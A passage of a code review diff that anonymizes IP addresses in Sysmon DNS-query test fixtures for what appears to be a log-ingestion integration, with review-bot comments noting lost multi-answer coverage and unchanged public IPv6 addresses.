"89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30" ] }, "network": { 
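Review bot: Eight distinct A records for dpm.demdex.net are now eight copies of `89.160.20.156`, so the fixture no longer exercises ordering or distinctness of multi-answer responses, and the related `ip` list collapses to a single public entry plus `192.168.6.30`. If the supported test set contains more than one routable address, rotating two or three of them across these answers would keep that coverage while still avoiding real third-party addresses. At minimum a short note in the test README that the repetition is intentional would stop a later reviewer from reading it as a parsing defect.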
@@ -17061,21 +16878,14 @@ "dpm.demdex.net" ], "ip": [ - "54.157.69.185", - "18.209.139.81", - "18.233.36.36", - "52.54.198.81", - "52.55.201.28", - "18.210.34.44", - "52.72.163.149", - "18.232.198.130", - "192.5.6.30" + "89.160.20.156", + "192.168.6.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313954250Z", + "ingested": "2021-12-09T13:49:44.739908900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053914100Z'/\u003e\u003cEventRecordID\u003e188\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.090\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edpm.demdex.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gslb-2.demdex.net;type: 5 edge-va6.demdex.net;type: 5 dcs-edge-va6-802167536.us-east-1.elb.amazonaws.com;::ffff:54.157.69.185;::ffff:18.209.139.81;::ffff:18.233.36.36;::ffff:52.54.198.81;::ffff:52.55.201.28;::ffff:18.210.34.44;::ffff:52.72.163.149;::ffff:18.232.198.130;192.5.6.30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053914100Z'/\u003e\u003cEventRecordID\u003e188\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.090\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edpm.demdex.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gslb-2.demdex.net;type: 5 edge-va6.demdex.net;type: 5 dcs-edge-va6-802167536.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.053Z", 
@@ -17143,39 +16953,39 @@ "type": "CNAME" }, { - "data": "68.67.179.228", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.180.44", + "data": "89.160.20.156", "type": "A" }, { - "data": "204.13.192.141", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.178.230", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.178.252", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.23", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.232", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.180.12", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -17183,22 +16993,22 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "68.67.179.228", - "68.67.180.44", - "204.13.192.141", - "68.67.178.230", - "68.67.178.252", - "68.67.179.23", - "68.67.179.232", - "68.67.180.12", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { 
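Review bot: The IPv4 answers in this hunk are replaced, but the public IPv6 answer `"2001:503:a83e::2:30"` is left unchanged in `answers` and `resolved_ip` (and, in the following hunk, in `related.ip` and the raw `event.original`), so the fixture still carries real public addresses after a change whose stated purpose is to limit test data to the supported subset. If that subset includes IPv6 addresses, the AAAA records should receive the same treatment; if IPv6 is deliberately exempt, a short note in the changelog entry or the data stream's test README saying so would stop the next reviewer from reopening this. The same untouched IPv6 values (`2001:503:a83e::2:30`, `2001:503:231d::2:30`, `2001:503:83eb::30`, `2001:500:856e::30`, `2001:502:1ca1::30`) remain in the hunks at @@ -17215 and from @@ -17391 through @@ -18051.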
@@ -17215,23 +17025,16 @@ "secure.adnxs.com" ], "ip": [ - "68.67.179.228", - "68.67.180.44", - "204.13.192.141", - "68.67.178.230", - "68.67.178.252", - "68.67.179.23", - "68.67.179.232", - "68.67.180.12", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313955519Z", + "ingested": "2021-12-09T13:49:44.739914600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053938800Z'/\u003e\u003cEventRecordID\u003e189\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.308\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esecure.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 
ib.anycast.adnxs.com;::ffff:68.67.179.228;::ffff:68.67.180.44;::ffff:204.13.192.141;::ffff:68.67.178.230;::ffff:68.67.178.252;::ffff:68.67.179.23;::ffff:68.67.179.232;::ffff:68.67.180.12;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053938800Z'/\u003e\u003cEventRecordID\u003e189\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.308\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esecure.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.053Z", @@ -17299,12 +17102,12 @@ "type": "CNAME" }, { - "data": "204.154.111.122", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "network": { 
@@ -17321,13 +17124,13 @@ "tps.doubleverify.com" ], "ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313956779Z", + "ingested": "2021-12-09T13:49:44.739920400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053949300Z'/\u003e\u003cEventRecordID\u003e190\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.478\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053949300Z'/\u003e\u003cEventRecordID\u003e190\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.478\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.053Z", 
@@ -17391,39 +17194,39 @@ "type": "CNAME" }, { - "data": "52.71.175.22", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.71.208.229", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.86.201.172", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.7.6.198", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.152.156.164", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.152.56.202", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.164.15.83", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.86.191.75", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -17431,22 +17234,22 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "52.71.175.22", - "52.71.208.229", - "52.86.201.172", - "52.7.6.198", - "54.152.156.164", - "54.152.56.202", - "54.164.15.83", - "52.86.191.75", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { 
@@ -17462,23 +17265,16 @@ "i.liadm.com" ], "ip": [ - "52.71.175.22", - "52.71.208.229", - "52.86.201.172", - "52.7.6.198", - "54.152.156.164", - "54.152.56.202", - "54.164.15.83", - "52.86.191.75", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313958100Z", + "ingested": "2021-12-09T13:49:44.739926300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067752300Z'/\u003e\u003cEventRecordID\u003e191\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.536\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ei.liadm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
idaas-production.us-east-1.elasticbeanstalk.com;::ffff:52.71.175.22;::ffff:52.71.208.229;::ffff:52.86.201.172;::ffff:52.7.6.198;::ffff:54.152.156.164;::ffff:54.152.56.202;::ffff:54.164.15.83;::ffff:52.86.191.75;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067752300Z'/\u003e\u003cEventRecordID\u003e191\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.536\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ei.liadm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idaas-production.us-east-1.elasticbeanstalk.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -17538,11 +17334,11 @@ }, "answers": [ { - "data": "67.231.251.189", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -17550,7 +17346,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -17558,7 +17354,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -17566,7 +17362,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -17574,7 +17370,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -17582,23 +17378,23 @@ "type": "AAAA" }, { - "data": "192.35.51.30", + "data": "192.168.51.30", "type": "A" } ], "resolved_ip": [ - "67.231.251.189", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "network": { 
@@ -17613,24 +17409,24 @@ "pixel.s3xified.com" ], "ip": [ - "67.231.251.189", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313959450Z", + "ingested": "2021-12-09T13:49:44.739932100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067766000Z'/\u003e\u003cEventRecordID\u003e192\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.544\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.s3xified.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:67.231.251.189;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067766000Z'/\u003e\u003cEventRecordID\u003e192\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.544\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.s3xified.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -17690,15 +17486,15 @@ }, "answers": [ { - "data": "104.20.252.85", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.20.253.85", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -17706,7 +17502,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -17714,7 +17510,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -17722,7 +17518,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -17730,22 +17526,22 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "104.20.252.85", - "104.20.253.85", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { 
@@ -17760,23 +17556,22 @@ "router.infolinks.com" ], "ip": [ - "104.20.252.85", - "104.20.253.85", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313960856Z", + "ingested": "2021-12-09T13:49:44.739938400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated 